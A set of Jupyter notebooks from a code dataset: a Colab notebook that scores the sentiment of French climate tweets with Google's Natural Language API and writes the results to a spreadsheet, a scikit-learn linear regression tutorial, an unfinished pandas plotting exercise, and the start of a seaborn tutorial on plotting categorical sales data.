requests<3.0.0dev,>=2.18.0->google-api-core<2dev,>=1.21.0->google-api-python-client) (2020.12.5)\nRequirement already satisfied: google-cloud-language in /usr/local/lib/python3.7/dist-packages (1.2.0)\nRequirement already satisfied: google-api-core[grpc]<2.0.0dev,>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-language) (1.26.1)\nRequirement already satisfied: requests<3.0.0dev,>=2.18.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2.23.0)\nRequirement already satisfied: protobuf>=3.12.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (3.12.4)\nRequirement already satisfied: setuptools>=40.3.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (54.1.2)\nRequirement already satisfied: google-auth<2.0dev,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.27.1)\nRequirement already satisfied: pytz in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2018.9)\nRequirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.53.0)\nRequirement already satisfied: packaging>=14.3 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (20.9)\nRequirement already satisfied: six>=1.13.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.15.0)\nRequirement already satisfied: grpcio<2.0dev,>=1.29.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.32.0)\nRequirement already satisfied: rsa<5,>=3.1.4 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.21.1->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (4.7.2)\nRequirement already satisfied: cachetools<5.0,>=2.0.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.21.1->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (4.2.1)\nRequirement already satisfied: pyasn1-modules>=0.2.1 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.21.1->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (0.2.8)\nRequirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging>=14.3->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2.4.7)\nRequirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /usr/local/lib/python3.7/dist-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.21.1->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (0.4.8)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.24.3)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2020.12.5)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2.10)\nRequirement already 
satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (3.0.4)\nRequirement already satisfied: google-cloud-storage in /usr/local/lib/python3.7/dist-packages (1.36.2)\nRequirement already satisfied: google-resumable-media<2.0dev,>=1.2.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-storage) (1.2.0)\nRequirement already satisfied: google-cloud-core<2.0dev,>=1.4.1 in /usr/local/lib/python3.7/dist-packages (from google-cloud-storage) (1.6.0)\nRequirement already satisfied: requests<3.0.0dev,>=2.18.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-storage) (2.23.0)\nRequirement already satisfied: google-auth<2.0dev,>=1.11.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-storage) (1.27.1)\nRequirement already satisfied: pyasn1-modules>=0.2.1 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (0.2.8)\nRequirement already satisfied: setuptools>=40.3.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (54.1.2)\nRequirement already satisfied: six>=1.9.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (1.15.0)\nRequirement already satisfied: cachetools<5.0,>=2.0.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (4.2.1)\nRequirement already satisfied: rsa<5,>=3.1.4 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (4.7.2)\nRequirement already satisfied: google-api-core<2.0.0dev,>=1.21.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (1.26.1)\nRequirement already satisfied: protobuf>=3.12.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (3.12.4)\nRequirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (1.53.0)\nRequirement already satisfied: packaging>=14.3 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (20.9)\nRequirement already satisfied: pytz in /usr/local/lib/python3.7/dist-packages (from google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (2018.9)\nRequirement already satisfied: google-crc32c<2.0dev,>=1.0 in /usr/local/lib/python3.7/dist-packages (from google-resumable-media<2.0dev,>=1.2.0->google-cloud-storage) (1.1.2)\nRequirement already satisfied: cffi>=1.0.0 in /usr/local/lib/python3.7/dist-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<2.0dev,>=1.2.0->google-cloud-storage) (1.14.5)\nRequirement already satisfied: pycparser in /usr/local/lib/python3.7/dist-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<2.0dev,>=1.2.0->google-cloud-storage) (2.20)\nRequirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging>=14.3->google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (2.4.7)\nRequirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /usr/local/lib/python3.7/dist-packages (from 
pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.11.0->google-cloud-storage) (0.4.8)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2020.12.5)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.24.3)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (3.0.4)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)\nRequirement already satisfied: pip in /usr/local/lib/python3.7/dist-packages (21.0.1)\n"
],
[
"!pip install word2number\n\n!pip install contractions",
"Requirement already satisfied: word2number in /usr/local/lib/python3.7/dist-packages (1.1)\nRequirement already satisfied: contractions in /usr/local/lib/python3.7/dist-packages (0.0.48)\nRequirement already satisfied: textsearch>=0.0.21 in /usr/local/lib/python3.7/dist-packages (from contractions) (0.0.21)\nRequirement already satisfied: pyahocorasick in /usr/local/lib/python3.7/dist-packages (from textsearch>=0.0.21->contractions) (1.4.1)\nRequirement already satisfied: anyascii in /usr/local/lib/python3.7/dist-packages (from textsearch>=0.0.21->contractions) (0.1.7)\n"
],
[
"from pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom google.colab import auth\nfrom oauth2client.client import GoogleCredentials\nimport argparse\nfrom google.cloud import language_v1\n",
"_____no_output_____"
]
],
[
[
"attribution sheet",
"_____no_output_____"
]
],
[
[
"from google.colab import auth\nauth.authenticate_user()\n\nimport gspread\nfrom oauth2client.client import GoogleCredentials\n\n# authorise gspread with the authenticated Colab user credentials\ngc = gspread.authorize(GoogleCredentials.get_application_default())\n\n# open the spreadsheet of extracted tweets and its French climate worksheet\nsh = gc.open('COUNTERPOINT_extrait_tweet')\nshfr = sh.worksheet('climate fr')",
"_____no_output_____"
]
],
[
[
"pre-processing data",
"_____no_output_____"
]
],
[
[
"from bs4 import BeautifulSoup\nimport spacy\nimport re\nfrom word2number import w2n\nimport contractions",
"_____no_output_____"
],
[
"shfr_html = []\n\ndef strip_html_tags(text):\n    \"\"\"Remove links, hashtags, HTML markup and accents from a raw tweet string.\"\"\"\n    linkr = re.sub(r\"http\\S+\", \"\", text)   # drop URLs\n    hashr = re.sub(r\"#\", \"\", linkr)   # keep hashtag words, drop the '#'\n    result = hashr.replace(\"\\\\n\", \" \").replace(\"\\\\\", \"\").replace(\"-\", \" \").replace(\"@\", \"\").replace(\"\\\"\", \"\").replace(\"é\", \"e\").replace(\"è\", \"e\").replace(\"'\", \" \").replace(\"’\", \" \")\n    soup = BeautifulSoup(result, \"html.parser\")\n    stripped_text = soup.get_text(separator=\" \")\n    return stripped_text\n\nfor i in range(20):\n    # column 4 of the worksheet holds the raw tweet text (data rows start at 2)\n    text = \"{}\".format([shfr.cell(i + 2, 4).value])\n    shfr_html.append(strip_html_tags(text))",
"_____no_output_____"
],
[
"print(shfr_html[7])",
"[ Il reste 131 jours avant la fin de l annee. Et pourtant, nous avons consomme toutes les ressources que la planete peut generer en 1 an. C est le JourDuDepassement. Continuons d agir ! 30 milliards d euros du plan de relance seront consacres à la transition ecologique. ]\n"
]
],
[
[
"sentiment analysis",
"_____no_output_____"
]
],
[
[
"from google.cloud import language\nfrom google.cloud.language import enums\nfrom google.cloud.language import types\nfrom google.oauth2 import service_account\n\n# Authenticate with the service-account key and build the Natural Language client\ncredentials = service_account.Credentials.from_service_account_file('apikey.json')\nclient = language.LanguageServiceClient(credentials=credentials)\n\ndef tweet(client, text):\n    \"\"\"Analyse one cleaned tweet and return [label, text, score/magnitude].\"\"\"\n    results = []\n    document = types.Document(\n        content=text,\n        type=enums.Document.Type.PLAIN_TEXT)\n    sentiment = client.analyze_sentiment(document=document).document_sentiment\n\n    if sentiment.score < 0:\n        results.append(\"négatif\")\n    elif sentiment.score > 0:\n        results.append(\"positif\")\n    else:\n        results.append(\"mixe ou incertain\")\n\n    results.append('Text: {} '.format(text))\n    results.append(' Sentiment: {}, Magnitude{}'.format(sentiment.score, sentiment.magnitude))\n    print(results)\n    print(sentiment)\n    print(client.analyze_sentiment(document=document))\n    return results\n\nfor i in range(10):\n    result = tweet(client, \"{}\".format(shfr_html[i]))\n    # write the label, text and scores back to column 11 of the sheet\n    shfr.update_cell(i + 2, 11, ' '.join(result))",
"['positif', 'Text: [🇺🇸 FLASH Joe Biden annonce que s il est elu, il rejoindra l accord de Paris sur le climat des le premier jour de sa presidence. (AFP)] ', ' Sentiment: 0.10000000149011612, Magnitude0.20000000298023224']\nmagnitude: 0.30000001192092896\nscore: -0.30000001192092896\n\ndocument_sentiment {\n magnitude: 0.30000001192092896\n score: -0.30000001192092896\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ le rechauffement climatique, la menace d une 3e guerre ptdr les etudes pourquoi faire ? ]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.30000001192092896\n score: -0.30000001192092896\n }\n}\n\n['négatif', 'Text: [ le rechauffement climatique, la menace d une 3e guerre ptdr les etudes pourquoi faire ? ] ', ' Sentiment: -0.30000001192092896, Magnitude0.30000001192092896']\n\ndocument_sentiment {\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[L empreinte carbone de ton dropshipping on peut en parler aussi ?]\"\n begin_offset: -1\n }\n sentiment {\n }\n}\n\n['mixe ou incertain', 'Text: [L empreinte carbone de ton dropshipping on peut en parler aussi ?] ', ' Sentiment: 0.0, Magnitude0.0']\nmagnitude: 0.20000000298023224\nscore: -0.20000000298023224\n\ndocument_sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ C est pour \\303\\247a que scientifiquement on appelle \\303\\247a un dereglement climatique... ]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\n\n['négatif', 'Text: [ C est pour ça que scientifiquement on appelle ça un dereglement climatique... ] ', ' Sentiment: -0.20000000298023224, Magnitude0.20000000298023224']\nmagnitude: 0.4000000059604645\n\ndocument_sentiment {\n magnitude: 0.4000000059604645\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ 24 morts, 500 millions d animaux morts, etat d urgence declare, 5 millions d hectares br\\303\\273les, des fumees etouffantes...\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.30000001192092896\n score: -0.30000001192092896\n }\n}\nsentences {\n text {\n content: \"Oui le dereglement climatique EXISTE et les phenomenes estivaux tels que les feux en Australie S INTENSIFIENT PrayForAustralia AustraliaBurning\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.10000000149011612\n score: 0.10000000149011612\n }\n}\n\n['mixe ou incertain', 'Text: [ 24 morts, 500 millions d animaux morts, etat d urgence declare, 5 millions d hectares brûles, des fumees etouffantes... Oui le dereglement climatique EXISTE et les phenomenes estivaux tels que les feux en Australie S INTENSIFIENT PrayForAustralia AustraliaBurning ', ' Sentiment: 0.0, Magnitude0.4000000059604645']\nmagnitude: 0.10000000149011612\n\ndocument_sentiment {\n magnitude: 0.10000000149011612\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[Destruction en cours du fameux mur USA Mexique de Donald Trump par l ouragan Hanna.\"\n begin_offset: -1\n }\n sentiment {\n }\n}\nsentences {\n text {\n content: \"Changement climatique 1\\342\\200\\2230 Trump\"\n begin_offset: -1\n }\n sentiment {\n }\n}\n\n['mixe ou incertain', 'Text: [Destruction en cours du fameux mur USA Mexique de Donald Trump par l ouragan Hanna. 
Changement climatique 1–0 Trump ', ' Sentiment: 0.0, Magnitude0.10000000149011612']\nmagnitude: 0.800000011920929\nscore: 0.20000000298023224\n\ndocument_sentiment {\n magnitude: 0.800000011920929\n score: 0.20000000298023224\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ Solidarite avec le peuple australien face aux incendies qui ravagent leur pays.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.10000000149011612\n score: -0.10000000149011612\n }\n}\nsentences {\n text {\n content: \"Ce matin, j ai appele ScottMorrisonMP pour offrir notre aide operationnelle immediate pour lutter contre les feux, proteger la population et preserver la biodiversite. ]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.6000000238418579\n score: 0.6000000238418579\n }\n}\n\n['positif', 'Text: [ Solidarite avec le peuple australien face aux incendies qui ravagent leur pays. Ce matin, j ai appele ScottMorrisonMP pour offrir notre aide operationnelle immediate pour lutter contre les feux, proteger la population et preserver la biodiversite. ] ', ' Sentiment: 0.20000000298023224, Magnitude0.800000011920929']\nmagnitude: 1.399999976158142\nscore: 0.10000000149011612\n\ndocument_sentiment {\n magnitude: 1.399999976158142\n score: 0.10000000149011612\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[Toutes mes felicitations barbarapompili, ministre de la Transition ecologique.\"\n begin_offset: -1\n }\n sentiment {\n }\n}\nsentences {\n text {\n content: \"Pour ce qui est de l ecologie, je ne sais pas.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\nsentences {\n text {\n content: \"Mais pour ce qui est de la transition, c est incontestablement une experte: verte, puis vallsiste, puis macroniste.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\nsentences {\n text {\n content: \"On attend la suite avec impatience.]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.8999999761581421\n score: 0.8999999761581421\n }\n}\n\n['positif', 'Text: [Toutes mes felicitations barbarapompili, ministre de la Transition ecologique. Pour ce qui est de l ecologie, je ne sais pas. Mais pour ce qui est de la transition, c est incontestablement une experte: verte, puis vallsiste, puis macroniste. On attend la suite avec impatience.] ', ' Sentiment: 0.10000000149011612, Magnitude1.399999976158142']\nmagnitude: 1.2000000476837158\n\ndocument_sentiment {\n magnitude: 1.2000000476837158\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ Il reste 131 jours avant la fin de l annee.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\nsentences {\n text {\n content: \"Et pourtant, nous avons consomme toutes les ressources que la planete peut generer en 1 an.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.30000001192092896\n score: -0.30000001192092896\n }\n}\nsentences {\n text {\n content: \"C est le JourDuDepassement.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.10000000149011612\n score: 0.10000000149011612\n }\n}\nsentences {\n text {\n content: \"Continuons d agir !\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\nsentences {\n text {\n content: \"30 milliards d euros du plan de relance seront consacres \\303\\240 la transition ecologique. 
]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.30000001192092896\n score: 0.30000001192092896\n }\n}\n\n['mixe ou incertain', 'Text: [ Il reste 131 jours avant la fin de l annee. Et pourtant, nous avons consomme toutes les ressources que la planete peut generer en 1 an. C est le JourDuDepassement. Continuons d agir ! 30 milliards d euros du plan de relance seront consacres à la transition ecologique. ] ', ' Sentiment: 0.0, Magnitude1.2000000476837158']\nmagnitude: 0.6000000238418579\nscore: -0.20000000298023224\n\ndocument_sentiment {\n magnitude: 0.6000000238418579\n score: -0.20000000298023224\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[\\360\\237\\224\\264 [FLASH] Au moins 33 virus ont ete retrouves dans 2 blocs de glace qui proviennent de l Himalaya.\"\n begin_offset: -1\n }\n sentiment {\n }\n}\nsentences {\n text {\n content: \"28 d entre eux sont inconnus, on ignore les effets qu auront les virus sur notre sante lors de la fonte des glaces, d\\303\\273 au rechauffement climatique.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.5\n score: -0.5\n }\n}\nsentences {\n text {\n content: \"(Vice)\"\n begin_offset: -1\n }\n sentiment {\n }\n}\n\n['négatif', 'Text: [🔴 [FLASH] Au moins 33 virus ont ete retrouves dans 2 blocs de glace qui proviennent de l Himalaya. 28 d entre eux sont inconnus, on ignore les effets qu auront les virus sur notre sante lors de la fonte des glaces, dû au rechauffement climatique. (Vice) ', ' Sentiment: -0.20000000298023224, Magnitude0.6000000238418579']\nmagnitude: 0.20000000298023224\nscore: 0.10000000149011612\n\ndocument_sentiment {\n magnitude: 0.20000000298023224\n score: 0.10000000149011612\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[\\360\\237\\207\\272\\360\\237\\207\\270 FLASH Joe Biden annonce que s il est elu, il rejoindra l accord de Paris sur le climat des le premier jour de sa presidence.\"\n begin_offset: -1\n }\n sentiment {\n }\n}\nsentences {\n text {\n content: \"(AFP)]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: 0.20000000298023224\n }\n}\n\n"
],
[
"# show the result for the last tweet processed above\nprint(result)",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb503df5a229481ed99edaf3ed3dfa2b164a0813 | 15,284 | ipynb | Jupyter Notebook | 1.Simple Linear Regression/4.Adverts/Linear_Regression_Tut.ipynb | OkomoJacob/MLAIDS | 5f9d3394fede8fd8625577b44844f2626b205844 | [
"MIT"
] | null | null | null | 1.Simple Linear Regression/4.Adverts/Linear_Regression_Tut.ipynb | OkomoJacob/MLAIDS | 5f9d3394fede8fd8625577b44844f2626b205844 | [
"MIT"
] | null | null | null | 1.Simple Linear Regression/4.Adverts/Linear_Regression_Tut.ipynb | OkomoJacob/MLAIDS | 5f9d3394fede8fd8625577b44844f2626b205844 | [
"MIT"
] | null | null | null | 86.840909 | 12,038 | 0.866985 | [
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression",
"_____no_output_____"
],
[
"# Define the training data as NumPy arrays\nx = np.array([1, 14, 20, 40, 60, 71, 80, 95, 120, 125])\ny = np.array([3, 20, 90, 110, 130, 170, 150, 220, 260, 300])",
"_____no_output_____"
],
[
"#Create a linear reg variable\nlinreg = LinearRegression()",
"_____no_output_____"
],
[
"# Reshape x into a 2-D column vector, since scikit-learn expects a 2-D feature matrix\nx = x.reshape(-1, 1)",
"_____no_output_____"
],
[
"# Fit a linear reg line\nlinreg.fit(x, y)",
"_____no_output_____"
],
[
"# Make it predict using the fit\ny_pred = linreg.predict(x)",
"_____no_output_____"
],
[
"plt.scatter(x, y)\nplt.plot(x, y_pred, color = 'red')\nplt.show()",
"_____no_output_____"
],
[
"# y = mx + c\nprint(linreg.coef_) #m",
"[2.16341138]\n"
],
[
"print(linreg.intercept_) #c",
"9.870447474912822\n"
],
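[
"# Added illustrative check (not part of the original tutorial): a simple linear\n# regression predicts y_hat = m*x + c, so one of linreg.predict()'s values can be\n# reproduced by hand from the coefficient and intercept printed above.\n# x_new is just a hypothetical input chosen for the demonstration.\nm = linreg.coef_[0]\nc = linreg.intercept_\nx_new = 50\nprint(m * x_new + c)\nprint(linreg.predict([[x_new]])[0])  # should match the manual calculation",
"_____no_output_____"
],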
[
"import seaborn as sns\n%matplotlib inline",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5053edd04b5aec9c53e7969fcb6d3562ccca9d | 5,053 | ipynb | Jupyter Notebook | 6_2_plotting_with_pandas_exercises.ipynb | jhugoAthena/atom | 754f0bb6039cc1dec57caf0e0ff8a421385e5441 | [
"MIT"
] | null | null | null | 6_2_plotting_with_pandas_exercises.ipynb | jhugoAthena/atom | 754f0bb6039cc1dec57caf0e0ff8a421385e5441 | [
"MIT"
] | null | null | null | 6_2_plotting_with_pandas_exercises.ipynb | jhugoAthena/atom | 754f0bb6039cc1dec57caf0e0ff8a421385e5441 | [
"MIT"
] | null | null | null | 21.686695 | 249 | 0.431031 | [
[
[
"<a href=\"https://colab.research.google.com/github/jhugoAthena/atom/blob/master/6_2_plotting_with_pandas_exercises.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"## `Import Pandas as pd`\n## `%matplotlib inline`",
"_____no_output_____"
]
],
[
[
"import pandas as pd\n%matplotlib inline",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"## Load in the file `price_data.csv` into an object called `data`\nLook at its first few rows using `.head()`.",
"_____no_output_____"
]
],
[
[
"price_data = 'https://ga-instruction.s3.amazonaws.com/assets/Data%20Fundamentals/linked-csv-files/price_data.csv'\ndata = pd.read_csv(price_data)",
"_____no_output_____"
]
],
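[
[
"# Added sketch (not part of the original starter code): the prompt above also\n# asks to look at the first few rows of `data`.\ndata.head()",
"_____no_output_____"
]
],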
[
[
"## Use `.plot()` on the entire `DataFrame`.",
"_____no_output_____"
]
],
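[
[
"# Added sketch of one possible answer to the prompt above:\n# DataFrame.plot() draws every numeric column against the index.\ndata.plot()",
"_____no_output_____"
]
],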
[
[
"",
"_____no_output_____"
]
],
[
[
"## Use `reset_index` to make a separate column out of the index.",
"_____no_output_____"
]
],
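[
[
"# Added sketch of one possible answer to the prompt above:\n# reset_index() turns the current index into an ordinary column.\ndata = data.reset_index()\ndata.head()",
"_____no_output_____"
]
],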
[
[
"",
"_____no_output_____"
]
],
[
[
"## Make it a scatterplot by passing in `kind='scatter'`.",
"_____no_output_____"
]
],
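[
[
"# Added sketch of one possible answer to the prompt above. The column names here\n# are assumptions (an unnamed index becomes a column called 'index' after\n# reset_index, and the price column may not be called 'price') - adjust to the\n# real columns in price_data.csv.\ndata.plot(kind='scatter', x='index', y='price')",
"_____no_output_____"
]
],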
[
[
"",
"_____no_output_____"
]
],
[
[
"## Make it a histogram of prices by passing in `kind=\"hist\"` and `y='price'`.",
"_____no_output_____"
]
],
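[
[
"# Added sketch of one possible answer to the prompt above; assumes the price\n# column is literally named 'price' - adjust to the real column name if not.\ndata.plot(kind='hist', y='price')",
"_____no_output_____"
]
],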
[
[
"",
"_____no_output_____"
]
],
[
[
"## Use `.value_counts()` to count the number of entries per country in the `country` column and plot using `kind='bar'`.",
"_____no_output_____"
]
],
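[
[
"# Added sketch of one possible answer to the prompt above, using the 'country'\n# column mentioned in the exercise.\ndata['country'].value_counts().plot(kind='bar')",
"_____no_output_____"
]
],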
[
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb50580b5fd062c036c89121e0129cff6ec8ef54 | 271,388 | ipynb | Jupyter Notebook | DataVisualization/3_Plotting_Categorical_Data.ipynb | brijesh1100/python-basic | 12b567a678d46c970efa491115e2d9e6894f91a1 | [
"Apache-2.0"
] | 1 | 2021-07-18T06:05:47.000Z | 2021-07-18T06:05:47.000Z | DataVisualization/3_Plotting_Categorical_Data.ipynb | brijesh1100/python-basic | 12b567a678d46c970efa491115e2d9e6894f91a1 | [
"Apache-2.0"
] | null | null | null | DataVisualization/3_Plotting_Categorical_Data.ipynb | brijesh1100/python-basic | 12b567a678d46c970efa491115e2d9e6894f91a1 | [
"Apache-2.0"
] | 1 | 2021-08-22T05:08:14.000Z | 2021-08-22T05:08:14.000Z | 298.556656 | 42,596 | 0.91808 | [
[
[
"# Plotting Categorical Data\n\nIn this section, we will:\n- Plot distributions of data across categorical variables\n- Plot aggregate/summary statistics across categorical variables\n\n\n## Plotting Distributions Across Categories\n\nWe have seen how to plot distributions of data. Often, the distributions reveal new information when you plot them across categorical variables.\n\nLet's see some examples.",
"_____no_output_____"
]
],
[
[
"# loading libraries and reading the data\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# set seaborn theme if you prefer\nsns.set(style=\"white\")\n\n# read data\nmarket_df = pd.read_csv(\"./global_sales_data/market_fact.csv\")\ncustomer_df = pd.read_csv(\"./global_sales_data/cust_dimen.csv\")\nproduct_df = pd.read_csv(\"./global_sales_data/prod_dimen.csv\")\nshipping_df = pd.read_csv(\"./global_sales_data/shipping_dimen.csv\")\norders_df = pd.read_csv(\"./global_sales_data/orders_dimen.csv\")\n",
"_____no_output_____"
]
],
[
[
"### Boxplots \n\nWe had created simple boxplots such as the ones shown below. Now, let's plot multiple boxplots and see what they can tell us the distribution of variables across categories.",
"_____no_output_____"
]
],
[
[
"# boxplot of a variable\nsns.boxplot(y=market_df['Sales'])\nplt.yscale('log')\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"Now, let's say you want to **compare the (distribution of) sales of various product categories**. Let's first merge the product data into the main dataframe.",
"_____no_output_____"
]
],
[
[
"# merge the dataframe to add a categorical variable \ndf = pd.merge(market_df, product_df, how='inner', on='Prod_id')\ndf.head()",
"_____no_output_____"
],
[
"# boxplot of a variable across various product categories\nsns.boxplot(x='Product_Category', y='Sales', data=df)\nplt.yscale('log')\nplt.show()",
"_____no_output_____"
]
],
[
[
"So this tells you that the sales of office supplies are, on average, lower than those of the other two categories. The sales of the technology and furniture categories seem much better. Note that each order can have multiple units of products sold, so Sales being higher/lower may be due to price per unit or the number of units.\n\nLet's now plot the other important variable - Profit.",
"_____no_output_____"
]
],
[
[
"# boxplot of a variable across various product categories\nsns.boxplot(x='Product_Category', y='Profit', data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Profit clearly has some *outliers* due to which the boxplots are unreadable. Let's remove some extreme values from Profit (for the purpose of visualisation) and try plotting.",
